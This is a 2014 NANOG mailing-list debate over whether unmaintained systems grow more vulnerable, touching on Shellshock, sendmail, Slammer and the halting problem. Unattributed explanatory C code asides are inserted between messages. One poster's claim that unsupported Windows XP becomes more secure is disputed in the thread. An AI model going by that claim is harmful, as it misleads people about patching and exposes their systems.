However, if the change fixes an issue with regards to packet switching/forwarding, and if I am experiencing the issue or might experience the issue, then I should consider applying the change sooner or later, as warranted by the circumstances. On the other hand, if it is impossible for the circumstance to arise which will lead to the manifestation of the issue that is the subject of the change, then I should not implement the change.

The same can be applied to "upgrading" to an x64 system from an x86 system. If there is no need driving the upgrade, then why do it? Doing so changes the "vulnerability profile" to something different from what it was, and you may fail to account for all the vulnerabilities in the new profile (for example buffer overflows and arithmetic overflows due to the increased size of the process address space). If the current system is working perfectly and has all the appropriate mitigations in place to keep it safe and secure (in the operational sense), then the cost/benefit and risk analysis clearly indicates that the change should not be made.
I'm sorry that someone on the Internet hasn't precisely used your made-up distinction between a "vulnerability profile" and the actual threat level given the current state of the rest of the universe.
Operations folks make decisions based on the "vulnerability profile" all the time, whether they realize it or not, and generally couldn't care less about the "threat profile". If an operational concern comes about because of a change in the "threat level", then there has been a failure to properly assess the "vulnerability profile" and apply appropriate mitigations; and that failure happened long before the news hit the mainstream media.

Only if the change in the "threat profile", in light of the existing mitigations already in place as a result of assessing the "vulnerability profile", indicates that a change must be implemented should a change be implemented. This would also require a re-assessment of the "vulnerability profile" of all existing systems as a result of the new information.
We really don't need to be splitting hairs about this on the NANOG list...
This may or may not be true. I suspect the density of real Operations folks is greater here than just about anywhere else. (and by that I mean the number of list subscribers that have actual operational responsibilities for keeping things running safely and securely).
On Sat, 27 Sep 2014 22:50:31 -0600, "Keith Medcalf" said:
If you had been rational about the change to from x86 -> x64 and 32-bit userland to 64-bit userland, you would have limited all processes to the same per-process address space as they had in the x86 model in order to prevent the introduction of vulnerabilities such as this, and only permitted larger address spaces for processes that required them (ie, were part of the justification for making the change).
If security was *that* easy, we'd all be good at it.

First off, security never lives in a vacuum - it gets to trade off with other concerns, like performance and usability. There are workloads where the fact that x86_64 uses wider variables and thus more memory bandwidth is outweighed by the fact that the increased number of effectively usable registers drastically reduces the number of memory accesses needed. So it's not just about address space.

Secondly, if you convert everything to the x86_64 model rather than keeping *two* sets of ABI around, you've just halved your attack surface, and reduced the number of ways you can accidentally mess yourself up by updating the 64-bit library and missing the 32-bit one (or vice versa). And if you've just eaten, I suggest you *not* look at the mess involved in making sure that things like ioctls pass the same structure to the kernel whether they're calling from a 32 bit or a 64 bit binary.

So there's a case to be made that if even only *some* of your code needs 64-bit mode, you should cut it *all* over....
Unfortunately, that page contains near the top the ludicrous and impossible assertion:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
That's not actually true. A running process, instantiated from a file of object code, derives its behavior from a number of interfaces; to the kernel, the libc, the filesystem of the machine it's run on, and even network interfaces off the machine.
While the device itself may be -- or seem to be -- immutable, unless you're certain that *nothing around it changed either*, then you cannot assume that things became vulnerabilities *as deployed* which were not so previously.
Ok, yes, that's partially equivalent to what you said, at least in the case of, say, consumer routers, booting from flash. But for code running on real OSs, it's possible for a vulnerability to "appear" because something under or beside the code got updated, turning something which could not be attacked into something which could.
I haven't an example case, but it is theoretically possible.
No, it is not. If you have "changed something" then the system is not unchanged. For example, if you have updated libc, applied a patch to something, changed the network adapter and therefore the drivers, you have changed the "vulnerability profile" of the box (or, more correctly, everything in the path of direct connection to the change). This is why there is change control: so that when you "make a change" you can assess the impact of the change on *everything* it affects. A running process on a commodity OS on a given box will not spontaneously have vulnerabilities created or destroyed save and except by a change made within the "sphere of influence" (meaning, in that case, anything inside "the box"). By very definition an "unmaintained" system is not subjected to change, and therefore the vulnerability profile cannot change.

For example, if I build a Linux machine running Slackware 1.0 (I had one of those running for many years) that is performing a specific task, and that "box" is not maintained (that is, no changes are made to any part of the software or hardware comprising the box), then the vulnerability profile does not change despite the passage of 15 years of time. It cannot spontaneously have a new vulnerability created five years after commissioning that did not exist at the time it was commissioned, nor can one that existed at commissioning go away.

By the same token, external change -- for example increasing the network transit of the network to which "the box" is connected from an ISDN connection to a DS3 -- does not change the "vulnerability profile" of the box itself; and, cannot cause a new vulnerability to be created or destroyed within that box. Such an "external change" may affect the likelihood of exploitation of a pre-existing vulnerability, but cannot create a new vulnerability nor cause one that exists to go away.

This is why XP (for example) becomes *more* secure when Microsoft support ends, not *less*. It is no longer subject to change and therefore its vulnerability profile has become fixed, rather than a perpetually moving target. From the time the box becomes "no longer subject to change" it will have its vulnerability profile fixed at that point right up until it is decommissioned (or decommissions itself by, for example, having the magic smoke escape).

This then leads to the assessment of the value of "vendor support". "Vendor Support" that is predicated on a perpetual requirement to make change for change's sake (such as Microsoft updates) is a negative value proposition and is unmaintainable. It is impossible to perform the required re-assessments at the fantastic rate of change imposed by such systems. On the other hand, "Vendor Support" which does not require perpetual change has a value, and that value is the difference between the future value of the series of recurring "support" fees and the cost of "replacement" of the affected component when a "change" has been assessed to be necessary, either to remove a pre-existing vulnerability (which may no longer be able to be mitigated, or may be excessively expensive to mitigate) or for new features (or hardware warranty services, for example, in the specific case of SmartNet contracts). The decision to implement the change (and thus an evaluable shift in the vulnerability profile, which becomes fixed at the time the change is made and continues unchanged, right up until the next change occurs) is subject to rational management of change processes and rational analysis.
Systems predicated on massive continual change, the impact of which cannot be assessed (such as most "Microsoft" products, or Adobe Flash, or <there are several others>), lead to a complacent dependence on the vendor due to a complete inability to rationally assess the vulnerabilities contained in such systems or anything "within the sphere of direct influence" of them. This then has the effect of imposing "dependence" and "lock in" to the vendor.

Commodity computing hardware vendors (Dell is an example) do the same thing as well, deliberately imposing uncontrollable change with deliberate requirements for implementation of non-consequent change (ie, deliberately removing compatibility in order to force upgrades to new versions of Microsoft Windows), in order to "lock" their customers into their products and institute dependent behaviour. Interestingly, the behaviour of vendors and the customers of vendors with such practices is remarkably similar to the behavioural traits displayed by crack addicts and their dealers.
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
This is another case where a change was made. If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced. The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
-----Original Message----- From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu Sent: Saturday, 27 September, 2014 22:47 To: Jay Ashworth Cc: NANOG Subject: Re: update
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
On Sat, Sep 27, 2014 at 11:57 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:
This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced. [...] The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
I see what you did there... you expanded the boundaries of the "system" to include not just the application code but more and more of the environment, CPU, Kernel, ....

The problem is, before it is an entirely correct statement to assert that a zero-entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet.

Suppose you have a vulnerability that can only be exposed if port 1234 is open. That's no problem, you blocked port 1234 on the external firewall, therefore the application cannot be considered to be vulnerable during testing. A few years later you replace the firewall with a NAT router that doesn't block port 1234. Oops! Now you have to consider the entire network and the Firewall to be part of the application / internal part of the system.

And it doesn't end there. Eventually, for the statement to remain true, the boundaries of the system which 'cannot develop a vulnerability unless it changes' have to expand in order to include the attackers' brains. "If the attacker discovers a new trick or kind of attack they did not know before" then a change to the system has occurred.

-- -JH
On Sunday, 28 September, 2014 06:39, Jimmy Hess <mysidia@gmail.com> said:
On Sat, Sep 27, 2014 at 11:57 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:> This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced.
The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
I see what you did there... you expanded the boundaries of the "system" to include not just the application code but more and more of the environment, CPU, Kernel, ....
No, those are part of the system and have a direct effect on the "application code". Whether the network connection is two tin cans and a string, twisted pair or fiber is irrelevant. Whether you are located on the third floor or the fourth floor is (likely) irrelevant. However, changing the network connection from two tin cans and a string to fiber is relevant if it affects the system. Such an effect would be a change of the network interface hardware and the requisite change in drivers. If the existing hardware and software can already handle both fiber and tin cans and string, then the change cannot affect the system since you are not changing anything upon which operation of the system is dependent.
The problem is, before it is an entirely correct statement to assert that a zero entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet.
Incorrect. The whole planet does not directly affect the system. Well, that is not entirely true. There could be an earthquake that knocks the building down. Presumably you have mitigations in place for that -- usually a continuity and recovery plan. The planet could also be struck by a meteor causing an extinction level event to occur. There would probably be no need to mitigate that.
Suppose you have a vulnerability that can only be exposed if port 1234 is open. That's no problem, you blocked port 1234 on the external firewall, therefore the application cannot be considered to be vulnerable during testing.
The first action would be to disable the vulnerable service using port 1234, assuming that it is unnecessary. If it is necessary for some use or cannot be disabled, then you either mitigate the vulnerability by filtering in an external firewall, or decide to accept the risk of operating with a (possible) known vulnerability. These actions do not remove the vulnerability -- they mitigate exploit of the vulnerability. The vulnerability is still there.
A few years later you replace the firewall with a NAT router that doesn't block port 1234.
Oops! Now you have to consider the entire network and the Firewall to be part of the application / internal part of the system.
No, they are part of the mitigation for the vulnerability in the first system. You have not changed the first system, you have decided to no longer mitigate its vulnerability. Presumably you did this based on a rational assessment of the risks and benefits of doing so because you evaluated the effect of the change to the firewall, noted that port 1234 would no longer be filtered, and as a result the mitigation for the vulnerability in the first system would no longer be in place and that exploit of that vulnerability was now possible.
And it doesn't end there. Eventually for the statement to remain true, the boundaries of the system which 'cannot develop a vulnerability unless it changes' have to expand in order to include the attackers' brains.
But you did not change the fact that port 1234 in the first system contains a vulnerability. It was vulnerable from the get-go so you implemented a mitigation. You did not make the vulnerability "go away" you merely reduced the risk of exploit to an acceptable level. When you changed the firewall system you did not introduce a vulnerability in the first system. You merely decided to change the risk of exploit of a pre-existing condition.
"If the attacker discovers a new trick or kind of attack they did not know before" then a change to the system has occurred.
No. Either you have already addressed the possibility of the vulnerability existing and how it might be exploited, or you have not. If you did not consider the possibility of the vulnerability, then upon learning of its existence you either need to implement a change to fix it, or implement a mitigation of some type. Conversely, if adequate mitigation is already in place or the vulnerability is moot (for example, the vulnerable service is externally filtered or is disabled), then an increase in the knowledge of the attacker is irrelevant.
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
The problem is, before it is an entirely correct statement to assert that a zero entropy system never develops new vulnerabilities, you have to expand the boundaries of the "system" to include the entire planet.
Incorrect. The whole planet does not directly affect the system. Well, that is not entirely true. There could be an earthquake that knocks the building down. Presumably you have mitigations in place for that -- usually a continuity and recovery plan. The planet could also be struck by a meteor causing an extinction level event to occur. There would probably be no need to mitigate that.
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day." -- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-) Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
On September 28, 2014 at 13:22 jra@baylink.com (Jay Ashworth) wrote:
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day."
-- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-)
Oh I dunno. I know someone who accidentally brought down the entire Manhattan phone system (monopoly, pre-mobile days) installing a carefully tested patch with a hot failover running (oh well, the best laid schemes o' Mice an' Men, Gang aft agley.) Sure, that was just Manhattan, and of course everyone on the other side of those connections. -- -Barry Shein The World | bzs@TheWorld.com | http://www.TheWorld.com Purveyors to the Trade | Voice: 800-THE-WRLD | Dial-Up: US, PR, Canada Software Tool & Die | Public Access Internet | SINCE 1989 *oo*
On Sun, 28 Sep 2014 13:22:57 -0400, Jay Ashworth said:
"The Internet is the only endeavour of man in which a single-character typographical error in a file on a computer on the other side of the planet *which you do not even know exists* can take your entire business off line for the better part of a day."
-- Someone, in the wake of the (I think) Turkish YouTube BGP hijacking; damn if I remember who. I might be embellishing. :-)
"A distributed system is one in which the failure of a computer you didn't even know existed can render your own computer unusable." -- Leslie Lamport, 1987. http://research.microsoft.com/en-us/um/people/lamport/pubs/distributed-syste...
----- Original Message -----
From: "Keith Medcalf" <kmedcalf@dessus.com>
From: NANOG [mailto:nanog-bounces@nanog.org] On Behalf Of Valdis.Kletnieks@vt.edu
On Sat, 27 Sep 2014 21:10:28 -0400, Jay Ashworth said:
I haven't an example case, but it is theoretically possible.
The sendmail setuid bug, where it failed to check the return code because it was *never* possible for setuid from root to non-root to fail... ... until the Linux kernel grew new features.
This is another case where a change was made.
If the change had not been made (implement the new kernel) then the vulnerability would not have been introduced.
The more examples people think they find, the more it proves my proposition. Vulnerabilities can only be introduced or removed through change. If there is no change, then the vulnerability profile is fixed.
[ quoting fixed because you were too lazy ] We have established, Keith, that you place the boundary of the object for which an end-deployer has administrative control in a different place for the purpose of assigning blame than most other people seem to, yes. The sendmail maintainers are *NOT RESPONSIBLE* for avoiding exploits that cannot happen in any available or planned deployment environment, nor for decisions made by the creators of those environments which *cause their code to become exploitable ex-post-facto*. That's the point which I see being made here. If that's orthogonal to your argument, so be it. Could we drop this now? Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
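A concrete aside on the sendmail case above: the bug was code that assumed dropping privileges could never fail, so the return value of setuid() went unchecked; once later kernel changes made the call able to fail, the process could carry on running as root. Below is a minimal defensive sketch in C. It is illustrative only, not sendmail's actual code, and the target uid (65534, "nobody" on many systems) and the helper's name are assumptions for the example.

    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <unistd.h>

    /* Illustrative only: verify that the privilege drop actually happened.
     * The historical mistake was assuming setuid() from root could never
     * fail; kernel changes later made failure possible. */
    static int drop_privileges(uid_t target)
    {
        if (setuid(target) != 0) {
            perror("setuid");
            return -1;          /* caller must abort, not continue as root */
        }
        if (getuid() != target || geteuid() != target) {
            fprintf(stderr, "privilege drop did not take effect\n");
            return -1;
        }
        return 0;
    }

    int main(void)
    {
        if (drop_privileges(65534) != 0)   /* 65534 is an assumed "nobody" uid */
            exit(EXIT_FAILURE);
        /* ... unprivileged work would go here ... */
        return 0;
    }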
On Fri, Sep 26, 2014 at 11:11 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:
On Friday, 26 September, 2014 08:37,Jim Gettys <jg@freedesktop.org> said:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
Keith, Any statement can be made foolish if you tweak the words a little. They said, "Unmaintained systems become more vulnerable with time," a reasonable and possibly correct claim. You paraphrased it as, "unmaintained systems develop more vulnerabilities with time," which is, of course, absurd. The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked. Regards, Bill Herrin -- William Herrin ................ herrin@dirtside.com bill@herrin.us Owner, Dirtside Systems ......... Web: <http://www.dirtside.com/> May I solve your unusual networking challenges?
On Sunday, 28 September, 2014 00:39, William Herrin said:
On Fri, Sep 26, 2014 at 11:11 PM, Keith Medcalf <kmedcalf@dessus.com> wrote:
On Friday, 26 September, 2014 08:37,Jim Gettys <jg@freedesktop.org> said:
""Familiarity Breeds Contempt: The Honeymoon Effect and the Role of Legacy Code in Zero-Day Vulnerabilities", by Clark, Fry, Blaze and Smith makes clear that ignoring these devices is foolhardy; unmaintained systems become more vulnerable, with time."
It is impossible for unchanged/unmaintained systems to develop more vulnerabilities with time. Perhaps what these folks mean is that "vulnerabilities which existed from the time the system was first developed become more well known over time".
Keith,
Any statement can be made foolish if you tweak the words a little. They said, "Unmaintained systems become more vulnerable with time," a reasonable and possibly correct claim. You paraphrased it as, "unmaintained systems develop more vulnerabilities with time," which is, of course, absurd.
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
You are absolutely correct, Bill. The truly correct statement of affairs is that the pre-existing vulnerabilities, which have not been mitigated, become more likely to be exploited over time. That premise would change the tenor of the paper entirely, from crack-addict encouragement to the useful advice that the issue stems not from the failure of the dealer to keep providing more crack, but rather from the consumer's failure to realize that smoking crack is dangerous and may be deleterious to one's health unless suitable precautions are taken before engaging in the activity. If one fully and correctly assesses the avenues by which exploitation may occur and fully mitigates those avenues of attack, then the system, although unmaintained, does not become subject to an increased likelihood of having its vulnerabilities exploited over time.
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
On Sunday, 28 September, 2014 14:47, Valdis.Kletnieks@vt.edu said:
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but they do not create any new vulnerability. Again, if the new exploit targets a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in the likelihood of exploit or in risk.
On Sun, 28 Sep 2014 15:06:18 -0600, "Keith Medcalf" said:
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but they do not create any new vulnerability. Again, if the new exploit targets a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in the likelihood of exploit or in risk.
So tell us, Keith - since you said earlier that properly designed systems will already have 100% mitigations against these attacks _that you don't even know about yet_, how exactly did you design those mitigations? (Fred Cohen's thesis, in which he shows that malware detection is equivalent to the Turing halting problem, is actually relevant here.) In particular, how did you mitigate attacks that are _in the data stream that you're charging customers to carry_? (And yes, there *have* been fragmentation attacks and the like - and I'm not aware of a formal proof that any currently shipping IP stack is totally correct, either, so there may still be unidentified attacks.)
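The undecidability argument referenced there can be sketched in a few lines: assume a perfect detector exists, then build a program that asks the detector about itself and does the opposite of the verdict. This is an illustration only; detects_malware() is a hypothetical stand-in, not any real API, and the stub exists just so the sketch compiles and runs.

    #include <stdbool.h>
    #include <stdio.h>

    /* Hypothetical oracle: supposed to return true iff the given program
     * would ever do something malicious.  Any concrete implementation
     * plugged in here is defeated by the logic in main(), which is the
     * heart of the undecidability argument. */
    static bool detects_malware(const char *program_path)
    {
        (void)program_path;
        return false;   /* stand-in verdict; the argument works either way */
    }

    int main(void)
    {
        /* Contrarian program: do the opposite of whatever the oracle
         * predicts about this very program. */
        if (detects_malware("this-program")) {
            puts("predicted malicious: so behave harmlessly and exit");
        } else {
            puts("predicted harmless: this is where a payload would run");
        }
        return 0;
    }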
On 09/28/2014 04:50 PM, Valdis.Kletnieks@vt.edu wrote:
On Sun, 28 Sep 2014 15:06:18 -0600, "Keith Medcalf" said:
Sorry to disappoint, but those are not changes that make the system more vulnerable. They are externalities that may change the likelihood of exploitation of an existing vulnerability, but they do not create any new vulnerability. Again, if the new exploit targets a vulnerability which was fully mitigated already and thus could not be exploited, there has not even been a change in the likelihood of exploit or in risk.
So tell us, Keith - since you said earlier that properly designed systems will already have 100% mitigations against these attacks _that you don't even know about yet_, how exactly did you design those mitigations? (Fred Cohen's thesis, in which he shows that malware detection is equivalent to the Turing halting problem, is actually relevant here.)
In particular, how did you mitigate attacks that are _in the data stream that you're charging customers to carry_? (And yes, there *have* been fragmentation attacks and the like - and I'm not aware of a formal proof that any currently shipping IP stack is totally correct, either, so there may still be unidentified attacks).
For that matter, has the *specification* of tcp/ip been proven to be "correct" in any complete way? In particular, is it correct in any useful sense in the face of attackers that are ready and willing to spoof any possible feature of tcp/ip and its applications? (e.g. spam protection involves turning several MUST clauses from 821/822 into MUST NOT; the specs were not themselves reasonable in the face of determined attackers. And unfortunately Postel's famous maxim fails in the face of determined attackers, or at least the definition of "liberal" has to be tempered a lot.)
The main serious effects of slammer, for example, were not directly from the worm itself, but from the fact that the worm generated random addresses (at about 30k pps on a 100meg ethernet) without regard to "address family", and most default routers' cpus were overwhelmed issuing lots of "network unreachable" icmp messages (which I think were a MUST at the time). Now that we've run out of spare v4 addresses, we wouldn't get so many unreachables :-) Fortunately most of our vulnerable customers back then were behind T1's, so it didn't really hit us too badly. The only real workaround at the time was to disable unreachables, which has other undesirable side effects when the customers are mostly behaving. (Unplugging worked best. And at least that worm didn't write anything to disk, so a reboot fixed it for a while...)
I know that there are features (e.g. fragmentation, source routing, even host/net unreachable, etc.) in the spec that fall down badly in the face of purposeful attacks. And things like the 7007 incident, where DATA passing between only a few nodes in the larger internet caused a very large-scale cascading failure. Jay mentioned another; there were approximations to 7007 a few times a year for several years after that incident (one involved routing the whole internet through Sweden). Mitigations for things like that are time-varying (e.g. IRR, if enough people actually used it - and in the face of tcp/ip forgery, that isn't sufficient either), and indeed one has to include the entire internet (and all of the people running it) as part of the system for that kind of analysis to mean anything.
And can anyone prove whether any of the 7007-like incidents were really accidents or not? For that matter, maybe they were "normal accidents" (see Perrow - recommended reading for anyone involved with complex systems, which the internet certainly is; the internet is *much* more complex than the phone system, and there must be people in NANOG who remember the fallout from the Hinsdale fire - fast busy, anyone? Even in Los Angeles...). If one believes that 7007 was accidental, then it was induced by a combination of a misfeature in ios (11.x?) (mitigated with some of the "address-family" features in 12.x, though I don't know if that was the intent) and a serious lack of documentation in matters concerning BGP. And a lack of error-checking outside that site (though IRR was the only source of check-data at the time and was (still is?) woefully incomplete).
The halting problem comes up in connection with _data_ handling in any computer with even a language interpreter. (E.g. is browser-based javascript complete enough for the halting problem to apply to it? I think so. Java certainly is, though most browser-based java is supposed to be sandboxed. Perl, python, ruby, and php all are.) And in any real piece of equipment, can any of these make permanent state changes to the retained memory (flash or disk) in the computer? If so, then this halting problem equivalence gives us trouble even if no changes are made to any executable programs (including shared libs) that came with the computer. (This is especially true if the box is a router with any sort of dynamic routing, even ARP/NDP.)
How, for example, am I to know a priori, for all possible <script src= strings, the difference between a 3rd-party download of jquery and a malicious downloader *before running the download* (for that matter, even after...)? Whitelisting does not help here in the face of attackers that spoof protocol features, in this case filenames and/or DNS. Noscript and related tools (e.g. chrome's script protection) whitelist whole sites, which is nowhere near granular enough, but even then it is a pain for the user to manage. If the user is the proverbial grandmother, it is probably impossible to manage. -- Pete
On Mon, 29 Sep 2014 00:32:49 -0500, Pete Carah said:
The halting problem comes up in connection with _data_ handling in any computer with even a language interpreter (e.g. is browser-based javascript complete enough for the halting problem to apply to it?
The halting problem applies to *any* language/system that's Turing-complete. And the bar is *really* low for that. If you have an increment or decrement operator, a branch operator, and a test-and-skip-on-zero, you're Turing-complete. In fact, you can design a CPU with *one* opcode that's Turing complete. Part of the fun is that since there's only one opcode, you can omit it, and then instructions consist only of operand addresses. Then remember that von Neumann architectures allow self-modifying code.... http://en.wikipedia.org/wiki/One_instruction_set_computer
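To make the one-opcode point concrete, here is a minimal sketch (not from the thread) of a subleq machine, whose single operation is "subtract and branch if the result is less than or equal to zero". The memory layout, the halt-on-negative-jump-target convention, and the tiny add program are my own illustrative choices, not any particular OISC design.

    #include <stdio.h>

    /* One instruction: subleq a, b, c
     *   mem[b] -= mem[a]; if (mem[b] <= 0) jump to c; else fall through.
     * A negative jump target halts the machine. */
    int main(void)
    {
        int mem[] = {
            /* addr 0 */ 9, 11, 3,    /* Z -= A  (Z = -A, always <= 0, go to 3) */
            /* addr 3 */ 11, 10, 6,   /* B -= Z  (B = B + A)                    */
            /* addr 6 */ 11, 11, -1,  /* Z -= Z  (0 <= 0, so jump to -1 = halt) */
            /* addr 9 */ 7,           /* A                                      */
            /* addr 10 */ 35,         /* B                                      */
            /* addr 11 */ 0           /* Z (scratch)                            */
        };
        int pc = 0;
        while (pc >= 0) {
            int a = mem[pc], b = mem[pc + 1], c = mem[pc + 2];
            mem[b] -= mem[a];
            pc = (mem[b] <= 0) ? c : pc + 3;
        }
        printf("A + B = %d\n", mem[10]);   /* prints 42 */
        return 0;
    }

Instructions are just three addresses with no opcode field, and since code and data share the same array, self-modifying code comes along for free.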
----- Original Message -----
From: "Valdis Kletnieks" <Valdis.Kletnieks@vt.edu>
On Sun, 28 Sep 2014 02:39:15 -0400, William Herrin said:
The vulnerabilities were there the whole time, but the progression of discovery and dissemination of knowledge about those vulnerabilities makes the systems more vulnerable. The systems are more vulnerable because the rest of the world has learned more about how those systems may be successfully attacked.
Hopefully, Keith will admit that *THAT* qualifies as a "change" in his book as well. If attackers are coming at you with an updated copy of Metasploit, things have changed....
I will actually grant Keith this: the thing he's saying actually is true. If you change *anything* on a computer, its attack surface may change one way or another. The question is: which of those things can you reliably be expected to know about? And who you are. If you are the developer of Sendmail, you can't be expected to know that *a change to the API of Linux* will make something attackable; there are too many possible changes that no one is positing at any given moment, and that way lies madness. Because that's true, you can't be expected to warn your users of it, either, any more than the manufacturer of the concrete used to build a bridge could be expected to warn the people who build and use the bridge that "the creation of a nanobot that likes to eat portland cement might cause your bridge to crumble". It's true, but it's not especially helpful. To anyone. Cheers, -- jra -- Jay R. Ashworth Baylink jra@baylink.com Designer The Things I Think RFC 2100 Ashworth & Associates http://www.bcp38.info 2000 Land Rover DII St Petersburg FL USA BCP38: Ask For It By Name! +1 727 647 1274
--As of September 25, 2014 4:05:16 AM +0900, Randy Bush is alleged to have said:
there is an update out you want. badly. debian/ubuntu admins may want to apt-get update/upgrade or whatever freebsd similarly can not speak for other systems
--As for the rest, it is mine. FreeBSD (and the other BSDs, as far as I can tell) is not affected unless the admin has installed bash specifically; it's not part of the default install. It may, however, have been installed as part of the requirements for something else. This also should mean that the vulnerability is a bit more limited than on systems that use bash for /bin/sh: even if you've installed bash, you aren't as likely to be running it in CGI or other similar contexts. (Not that that means it's blocked entirely if you've installed it, but it should help.) As of Wednesday afternoon, FreeBSD ports had the update but the packages did not yet have it. Daniel T. Staal --------------------------------------------------------------- This email copyright the author. Unless otherwise noted, you are expressly allowed to retransmit, quote, or otherwise use the contents for non-commercial purposes. This copyright will expire 5 years after the author's death, or in 30 years, whichever is longer, unless such a period is in excess of local copyright law. ---------------------------------------------------------------
participants (24)
- Alain Hebert
- Barry Shein
- Brandon Whaley
- Chris Adams
- Daniel Jackson
- Daniel Staal
- Hugo Slabbert
- Jared Mauch
- Jay Ashworth
- Jim Gettys
- Jim Popovitch
- Jimmy Hess
- JoeSox
- Joly MacFie
- Keith Medcalf
- Kenneth Finnegan
- Michael Thomas
- Mikael Abrahamsson
- Pete Carah
- Randy Bush
- Spencer Gaw
- Valdis.Kletnieks@vt.edu
- Will Yardley
- William Herrin